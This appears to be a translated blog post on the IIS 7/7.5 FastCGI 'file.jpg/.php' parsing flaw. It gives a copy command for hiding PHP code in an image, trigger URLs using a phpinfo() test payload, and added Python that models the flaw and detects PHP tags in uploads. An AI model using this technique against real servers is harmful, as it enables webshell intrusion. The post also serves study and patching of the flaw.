IIS server parsing vulnerability

Today I ran into an IIS 7.5 server and wanted to try uploading an image webshell. But I had no test environment, and since I had not used this for a long time I had forgotten it, so I simply set the environment up again to review it.

0x00 Principle

With IIS 7 / 7.5 running PHP in FastCGI mode, appending /xx.php to a file path (/xx.jpg, giving /xx.jpg/xx.php) makes the server parse that file as PHP. IIS behaves the same way as Nginx here: once it sees that the URL's extension is .php, it hands the request to PHP regardless of whether that file exists. PHP, in turn, has cgi.fix_pathinfo enabled by default, which "repairs" the file path. What does "repair" mean? Given a PHP file path such as "/aaa.xxx/bbb.yyy/ccc.zzz", if "/aaa.xxx/bbb.yyy/ccc.zzz" does not exist, PHP strips the last segment "/ccc.zzz" and checks whether "/aaa.xxx/bbb.yyy" exists; if it does, "/aaa.xxx/bbb.yyy" is treated as the script for the request "/aaa.xxx/bbb.yyy/ccc.zzz" (the stripped part becomes PATH_INFO). If "/aaa.xxx/bbb.yyy" still does not exist, it strips "/bbb.yyy" as well, and so on until something exists or nothing is left.

So for an existing file test.jpg, appending /.php makes IIS send the request "test.jpg/.php" to PHP; PHP "repairs" the path "test.jpg/.php" to "test.jpg", finds that the file exists, and executes it as a PHP program.

Common exploitation method: merge an image with a text file that contains the backdoor, so that the malicious code is written into the image file, then upload the image and trigger it with the /.php suffix.

Making the image webshell (Windows command prompt):

    copy xx.jpg /b + yy.txt /a cc.jpg

    // /b  binary mode: xx.jpg is the normal image
    // /a  ASCII (text) mode: yy.txt is the text file containing the PHP code
    // cc.jpg is the resulting image that carries the backdoor
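As an added example (not code from the original post), the following Python does the same thing as the copy command above and then shows why the result passes a naive upload check yet still carries the backdoor: a minimal constructed JPEG (SOI marker, one APP0/JFIF segment, EOI marker) is concatenated with the PHP text, the magic bytes are checked the way a header-only filter would check them, and a scan for PHP open tags over the whole file finds the payload at the end. The image bytes, the payload and all function names are assumptions made for this example.

```python
# Minimal but structurally valid JPEG, constructed for this example:
# SOI marker, one APP0/JFIF segment, EOI marker (22 bytes in total).
MINIMAL_JPEG = (
    b"\xff\xd8"                                   # SOI
    b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00"       # APP0, length 16, JFIF 1.1
    b"\x00\x01\x00\x01\x00\x00"                   # 1x1 density, no thumbnail
    b"\xff\xd9"                                   # EOI
)

# The "yy.txt" of the copy command (constructed payload).
PAYLOAD = b"<?php phpinfo();?>"


def make_image_shell(image_bytes, payload):
    """Same result as `copy xx.jpg /b + yy.txt /a cc.jpg`: payload after the image."""
    return image_bytes + payload


def looks_like_jpeg(data):
    """What a header-only upload filter checks: the SOI magic at offset 0."""
    return data[:2] == b"\xff\xd8"


def find_php_tags(data):
    """Defender-side check: offsets of every PHP open tag anywhere in the file."""
    offsets = []
    for tag in (b"<?php", b"<?="):
        start = 0
        while True:
            idx = data.find(tag, start)
            if idx == -1:
                break
            offsets.append(idx)
            start = idx + len(tag)
    return sorted(offsets)


def demo():
    """Build the image shell and report what each check sees."""
    shell = make_image_shell(MINIMAL_JPEG, PAYLOAD)
    return {
        "passes_magic_check": looks_like_jpeg(shell),   # True: header is intact
        "payload_offset": shell.find(PAYLOAD),          # 22: right after EOI
        "php_tag_offsets": find_php_tags(shell),        # [22]
        "clean_image_tags": find_php_tags(MINIMAL_JPEG),  # []
        "size": len(shell),                             # 40
    }


if __name__ == "__main__":
    # Write the equivalent of cc.jpg next to this script.
    with open("cc.jpg", "wb") as f:
        f.write(make_image_shell(MINIMAL_JPEG, PAYLOAD))
    print(demo())
```

PHP treats bytes outside the <?php ... ?> tags as literal output, so the leading JPEG data does not stop the code appended at the end from running once the file is handed to PHP. A filter that only inspects the first bytes of an upload therefore learns nothing; the detector above scans the whole file, which is the check an upload handler should actually perform.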


0x01 Prerequisites

1. php.ini setting

In php.ini set cgi.fix_pathinfo = 1 (this is the default value).


2. IIS setting

In Handler Mappings (处理程序映射), open the PHP handler and uncheck the option shown in the screenshot (the image is not preserved here; it is the Request Restrictions option "Invoke handler only if request is mapped to" a file). While that box is ticked, IIS only passes a URL to PHP if it maps to an existing file, so a request for test.jpg/.php never reaches PHP.


Afterwards it is best to restart the machine.


0x02 Triggering process

First create a new txt file in the IIS web directory with the following content:

<?php phpinfo();?>


Then open the txt file in the browser; its contents are displayed directly as plain text.

http://127.0.0.1/q/1.txt


Append /.php to the end of the URL path; the PHP code is executed successfully.

http://127.0.0.1/q/1.txt/.php
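The path repair described in 0x00 and the 1.txt/.php request above, reproduced as an added Python model (this is not the post's code and not PHP's real implementation): fix_pathinfo() walks back from the requested path one segment at a time until an existing file is found, and php_would_execute() combines that with the two IIS-side conditions from 0x01, the extension-based handler mapping and the "invoke only if mapped to a file" restriction. It rebuilds the post's q/1.txt in a temporary document root and tries the vulnerable configuration next to the two fixed ones. The temporary directory, the helper names and the simplified decision logic are assumptions of the example.

```python
import os
import tempfile


def fix_pathinfo(docroot, uri):
    """Model of PHP-CGI's cgi.fix_pathinfo=1 script lookup (simplified).

    Starting from the full request path, drop the trailing segment until a
    path that exists as a regular file is found. Returns
    (script_path, path_info), or None when no prefix exists as a file.
    """
    parts = uri.strip("/").split("/")
    path_info = ""
    while parts:
        candidate = os.path.join(docroot, *parts)
        if os.path.isfile(candidate):
            return "/" + "/".join(parts), path_info
        # Move the last segment into PATH_INFO and try the parent path.
        path_info = "/" + parts.pop() + path_info
    return None


def php_would_execute(docroot, uri, fix_pathinfo_enabled=True,
                      handler_requires_file=False):
    """Which file (if any) PHP ends up executing for a request to `uri`.

    fix_pathinfo_enabled   models cgi.fix_pathinfo=1 in php.ini
    handler_requires_file  models the IIS handler-mapping request restriction
                           'Invoke handler only if request is mapped to: File'
    Returns the executed script path, or None if PHP never runs a file.
    """
    # IIS selects the PHP handler on the URL extension alone.
    if not uri.lower().endswith(".php"):
        return None
    physical = os.path.join(docroot, uri.strip("/"))
    # With the restriction on, IIS checks the physical path first and
    # never invokes PHP for /q/1.txt/.php, because that path does not exist.
    if handler_requires_file and not os.path.isfile(physical):
        return None
    if not fix_pathinfo_enabled:
        # No repair: only a script at exactly that path would run.
        return uri if os.path.isfile(physical) else None
    resolved = fix_pathinfo(docroot, uri)
    return resolved[0] if resolved else None


def demo():
    """Rebuild the post's setup in a temp directory and try each configuration."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "q"))
        with open(os.path.join(root, "q", "1.txt"), "w") as f:
            f.write("<?php phpinfo();?>")  # constructed, same as the post's 1.txt
        return {
            "vulnerable": php_would_execute(root, "/q/1.txt/.php"),
            "nested": php_would_execute(root, "/q/1.txt/a.jpg/.php"),
            "path_info": fix_pathinfo(root, "/q/1.txt/a.jpg/.php")[1],
            "missing_file": php_would_execute(root, "/q/missing.jpg/.php"),
            "plain_txt": php_would_execute(root, "/q/1.txt"),
            "fix_pathinfo_off": php_would_execute(root, "/q/1.txt/.php",
                                                  fix_pathinfo_enabled=False),
            "handler_restricted": php_would_execute(root, "/q/1.txt/.php",
                                                    handler_requires_file=True),
        }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:20s} -> {value}")
```

In the vulnerable configuration both /q/1.txt/.php and the deeper /q/1.txt/a.jpg/.php resolve to /q/1.txt, which is exactly why a stored image (or any other uploaded file) becomes executable. Either fix on its own is enough in this model: cgi.fix_pathinfo = 0 stops the repair, and the handler restriction keeps IIS from invoking PHP for a URL that is not an existing file.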



Source: www.cnblogs.com/-py9-/p/12540075.html